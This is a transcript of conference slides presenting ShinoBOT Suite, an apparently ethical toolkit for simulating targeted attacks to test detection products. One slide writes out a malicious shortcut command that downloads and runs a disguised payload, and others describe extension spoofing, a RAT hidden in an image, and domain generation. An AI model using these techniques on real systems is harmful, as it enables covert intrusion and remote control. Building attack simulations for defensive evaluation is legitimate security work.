shinobot suite presentation
TRANSCRIPT
1
Shota Shinogi @Sh1n0g1
http://shinosec.com
Security Researcher at Macnica Networks Corp.
Japanese Disty of security/network products
Enthusiast of writing (ethical) malware
Presented ShinoBOT (not Suite) last year at
Arsenal 2
ShinoBOT.exe
ShinoBOT is a RAT (simulator)
Presented at Black Hat USA 2013 Arsenal
It connects to ShinoC2, the C&C Server using HTTP(S).
What you can do with ShinoBOT via ShinoC2
Execute a command
Upload / Download a file
Take a screen shot
It is a SIMULATOR
it has a GUI
you need the password which is showed on the GUI to control it
3
ShinoBOT Suite is a tool kit to create an APT attack with just a few clicks, to simulate a highly-sophisticated attack campaign.
What is contained
Exploit (Shortcut contains a malicious script)
Malware Delivery Server (ShinoMAL.mooo.com)
Downloader/Dropper (ShinoDownloader.exe)
RAT (ShinoBOT.exe)
C&C Server (ShinoC2]
Steganography, crypto, DGA and some evasion techniques
4
There is a bunch of new security tools to detect/response the unknown threat
Sandbox based Malware Detection System
ETDR (Endpoint Threat Detect & Response)
SIEM (Security Information & Event Manager)
Security Analytics / Network Forensics
It is hard to evaluate those new products
Known malware will be detected by signature
♦ ≠ Unknown Threat
To simulate a realistic APT
♦ requires a high skill
♦ takes too much time
♦ spends a lot of money using some commercial tools
5
Malicious
Shortcut
Downloader
Dropper RAT
Decoy File
C&C
Server
Malware
Deploy
Server
dldr_tmp
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication 1)Download
2)Execute
img.jpg
3)Drop
6)Decrypt
7)Execute
6
Malicious
Shortcut
Downloader
Dropper RAT
Decoy File
C&C
Server
Malware
Deploy
Server
dldr_tmp
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication 1)Download
2)Execute
img.jpg
3)Drop
6)Decrypt
7)Execute
7
8
9
10
11
12
13
Decoy File
ShinoBOT works in
background
14
To control ShinoBOT (RAT), you need to grab
the password, it is to prevent the abuse of
ShinoBOT.
ShinoBOT saved its password to the same
folder (C:¥Users¥%USERNAME%¥sb.pas)
You can access to the password word file
remotely. ¥¥%MACHINENAME%¥C$¥Users¥%USERNAME%¥sb.pas
15
To control ShinoBOT (RAT), you need to grab
the password, it is to prevent the abuse of
ShinoBOT.
ShinoBOT saved its password in this text file.
(C:¥Users¥%USERNAME%¥sb.pas)
You can access to the password word file
remotely. ¥¥%MACHINENAME%¥C$¥Users¥%USERNAME%¥sb.pas
This password protection is to prevent the real guys to abuse
ShinoBOT.
16
Access to ShinoBOT.com
Go to the host list
Your host will appear in the host list
Click the [View/Assign Jobs] link
17
Put the password to see the Loot (result) of the
command
Put the password to assign a new job
Malicious Shortcut
"target" of the shortcut (all in 1 line)
cmd.exe /c powershell (new objectSystem.Net.WebClient) .DownloadFile('DOWNLOADERURL', '%TEMP%¥LicenseRnd.txt'); & %TEMP%¥LicenseRnd.txt & ::DECOYFILENAME
POWERSHELL downloads the downloader, and save it
CMD executes the downloader(Rnd means random string)
CMD ignores this line because :: means a comment
18
Extension Spoofing
On the target of shortcut, there is the line
"%TEMP%¥LicenseRnd.txt" (previous slide)
Usually, when you double click the file with .txt,
the notepad will launch
CMD.exe can execute the executables(contains
the MZ header) with any extension
ShinoBOT Suite uses this techniques to spoof
the extension, and make the donwloader hard
to be found from the disk
Actually, it is the ShinoDownloader.exe
19
Crypto Stuff
ShinoBOT Suite uses XOR and ROR (4 bit rotate)
Key is used just for the XOR, and ROR is always 4
bits
ShinoBOT Suite generates a random key (200 ~
255 byte) so it is little bit difficult to decrypt the
whole file without having the key
20
Steganography
The encrypted RAT is hidden in the kitten image.
JPG data
Encrypted RAT
[Binary Visualizer]
21
22
Domain Generation Algorithm
ShinoBOT (the RAT) uses pseudo-DGA.
It generates a random host name for the C2
Server.
rrrr.r.shinobot.com
" r " is replaced by a random character.
The DNS of shinobot.com responds any host
with the C2 server IP address.
Exploit
ShellCode
Downloader
Dropper RAT
Decoy File
C&C
Server
Malware
Deploy
Server
KB1234567.exe
Invitation.pdf
Invitation.pdf (legitimate)
ShinoBOT.exe
5)Download
4)Open
8)C2 Communication 1)Download
2)Execute
img.jpg
3)Drop
KB1234567.exe
6)Decrypt
7)Execute
Phishing Email
23
Visit my site and get the
recipe of ShinoBOT SUITE.
http://shinosec.com
24